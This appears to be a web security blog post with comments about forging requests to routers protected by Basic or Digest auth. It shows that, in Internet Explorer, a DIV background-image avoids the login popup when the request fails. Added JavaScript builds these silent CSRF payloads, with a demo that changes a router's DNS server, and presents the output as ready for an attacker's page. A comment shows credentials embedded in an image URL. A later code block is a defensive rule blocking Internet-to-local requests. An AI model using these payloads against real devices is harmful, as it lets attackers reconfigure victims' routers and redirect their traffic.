web application security lab

CSRF And Ignoring Basic/Digest Auth

One of the single most annoying things about CSRF against routers and similar devices is the popup you get on pages protected by Basic or Digest authentication, asking the user to log in. More and more devices are moving away from these popup-style dialogs towards form-based authentication, which is better from an attacker's perspective. Still, I would say the vast majority of firewall/switch/router devices out there use Basic or Digest authentication. The problem with that, from an attacker's perspective, is that a request which fails (because the user isn't currently authenticated to the device) produces a noisy login popup that the user is bound to notice and question. Well, now we have an answer, at least in Internet Explorer:

<DIV STYLE="background-image: url(http://router/path.to.hack)">blah</DIV>

I know there are other tags that work, but from what I've seen so far probably none as well as this method. I haven't found a reliable way to do this in other browsers, but I've only barely scratched the surface of the vast number of CSRF-able tags out there. Anyway, yes: this does not cause the Basic or Digest auth dialog to fire, so a CSRF attempt that fails is far more stealthy. Of course, for POST-based CSRF you're still out of luck, since a background image can only issue a GET.
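As an added example, not code from the original post, here is the same GET-based CSRF built in two delivery forms so they can be compared: the quiet DIV background-image variant from above, and the usual IMG tag. The target host "router", the path "/apply.cgi" and the parameter names are assumptions for illustration; the helpers also handle the escaping a real payload needs, since a quote or backslash in the URL would otherwise break out of the CSS url() token.

```javascript
// Added example (not code from the original post). Target host "router",
// path "/apply.cgi" and the parameter names are assumptions for illustration.

// Percent-encode query parameters so the GET carries exactly the intended
// values ('&', '=', spaces and non-ASCII are all safe).
function buildQuery(params) {
  return Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(String(v))}`)
    .join('&');
}

// Full GET URL for the device action being forged.
function csrfUrl(base, params) {
  const q = buildQuery(params);
  return q ? `${base}?${q}` : base;
}

// Escape a value for a single-quoted CSS url('...') token. A raw quote,
// backslash or newline would end or corrupt the token, so each is written
// as a CSS hex escape (the trailing space terminates the escape).
function cssEscape(s) {
  return s.replace(/['\\\n\r]/g, c => '\\' + c.charCodeAt(0).toString(16) + ' ');
}

// Escape a value for a double-quoted HTML attribute.
function htmlAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Quiet variant from the post: the request goes out as a background-image
// fetch. On failure, IE (per the post) does not raise the Basic/Digest prompt.
function stealthDivPayload(base, params) {
  const style = `background-image: url('${cssEscape(csrfUrl(base, params))}')`;
  return `<div style="${htmlAttr(style)}">blah</div>`;
}

// Noisy variant for comparison: an IMG issues the same GET, but when the
// device answers with an auth challenge the browser prompts the user.
function imgPayload(base, params) {
  return `<img src="${htmlAttr(csrfUrl(base, params))}" width="1" height="1">`;
}

// Demo with constructed values (the note parameter exists only to show escaping).
const demoTarget = 'http://router/apply.cgi';
const demoParams = { action: 'set', dns1: '1.2.3.4', note: "o'neil)" };
console.log(stealthDivPayload(demoTarget, demoParams));
console.log(imgPayload(demoTarget, demoParams));
```

The markup returned by stealthDivPayload is what you would drop into the attacker-controlled page; the IMG form is included only to make the difference in failure behaviour concrete when testing against a device.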

9 Responses to “CSRF And Ignoring Basic/Digest Auth”

  1. rwnin Says:

    <img src="https://username:password@u.r.gate.way/known/path/img.gif">

    the tag above will auth a session w/o a popup on basic-auth in ff last time i checked…


  2. RSnake Says:

    Yes, but what about when it fails? That is the real question.

  3. rwnin Says:

    if you have the wrong creds, the img shows as broken (red-x) and there’s no secondary prompt for creds (iirc, it’s been a while ;)

  4. RSnake Says:

    uhh… not in IE or Firefox… what browser are you using?

    Firefox alerts on failure, and IE doesn’t work at all because it doesn’t use that syntax anymore. Maybe another browser does…?

  5. Giorgio Maone Says:

    Talking about CSRF and router hacking, did you notice include finally ABE with a built-in LocalRodeo-like rule?

  6. Giorgio Maone Says:

    Broken post above. Should have been

    Talking about CSRF and router hacking, did you notice latest NoScript versions include finally ABE with a built-in LocalRodeo-like rule?

  7. RSnake Says:

    @Giorgio - I finally got a chance to look at it, and it looks really powerful. Not yet to the point of being brain dead, and I’m not sure it yet takes the place of things like Request Policy, but I can see where you’re going with it. I’ll email you a wishlist momentarily.
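As an added example (not NoScript's, ABE's or LocalRodeo's own code), here is the kind of LocalRodeo-like rule the comments above refer to, written as a standalone policy check: a request is denied when a page on a non-local origin targets a host whose address is local (RFC 1918, loopback, link-local), while local-to-local and Internet-to-Internet requests are accepted. The RESOLVE table standing in for DNS, and the hostnames in it, are constructed for the demo.

```javascript
// Added example (not NoScript/ABE/LocalRodeo code): a minimal
// "deny Internet -> local network" rule. RESOLVE is a constructed
// stand-in for DNS so the demo runs offline.

const LOCAL_RANGES = [
  ['10.0.0.0', 8], ['172.16.0.0', 12], ['192.168.0.0', 16], // RFC 1918
  ['127.0.0.0', 8],                                         // loopback
  ['169.254.0.0', 16],                                      // link-local
  ['0.0.0.0', 8],                                           // "this" network
];

// Dotted-quad IPv4 to unsigned 32-bit integer; null if not a strict dotted quad.
function ipv4ToInt(s) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(s);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  if (o.some(n => n > 255)) return null;
  return ((o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]) >>> 0;
}

function inRange(ip, base, bits) {
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ip & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
}

function isLocalIp(ipStr) {
  const ip = ipv4ToInt(ipStr);
  if (ip === null) return false;
  return LOCAL_RANGES.some(([base, bits]) => inRange(ip, base, bits));
}

// Constructed lookup table standing in for DNS.
const RESOLVE = {
  'router': '192.168.1.1',
  'localhost': '127.0.0.1',
  'example.com': '93.184.216.34',
  'evil.example': '203.0.113.10',
};

// Decide whether a hostname is local. Literal IPs are checked directly; the
// WHATWG URL parser has already normalised numeric forms such as 0x7f000001
// or 2130706433 into dotted quads, so those cannot slip past the check.
// Anything else goes through the resolver; an unresolvable name is treated
// as non-local.
function isLocalHost(hostname, resolve) {
  if (ipv4ToInt(hostname) !== null) return isLocalIp(hostname);
  const addr = resolve(hostname);
  return addr !== undefined && isLocalIp(addr);
}

// The rule: deny when a non-local page requests a local host.
function decide(pageOrigin, requestUrl, resolve = h => RESOLVE[h]) {
  const fromLocal = isLocalHost(new URL(pageOrigin).hostname, resolve);
  const toLocal = isLocalHost(new URL(requestUrl).hostname, resolve);
  return (toLocal && !fromLocal) ? 'deny' : 'accept';
}

console.log(decide('http://evil.example', 'http://router/apply.cgi'));   // deny
console.log(decide('http://192.168.1.20', 'http://router/apply.cgi'));   // accept
console.log(decide('http://evil.example', 'http://example.com/'));       // accept
```

The decision has to be made on the resolved address rather than on the hostname, which is why the check resolves names first: a page on the Internet can point at the same device through a DNS name it controls, and a rule that only matched "192.168." in the URL string would miss that.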

  8. runxc1 Says:

    A Post CSRF attack can also be accomplished very easily. If you would like to see an example of how to commit one I recently wrote an article demonstrating how to commit a CSRF post attack so that developers know how to defend against it. It can be found at blog.runxc.com/post/2009/07/06/CSRF-by-Example-How-to-do-it-How-to-defend-it.aspx

  9. RSnake Says:

    @runxc1 - a bit off topic, as this is about how to accomplish one under very specific circumstances, and no, POST wouldn’t work in that example. But it’s good that you’re thinking about the problem.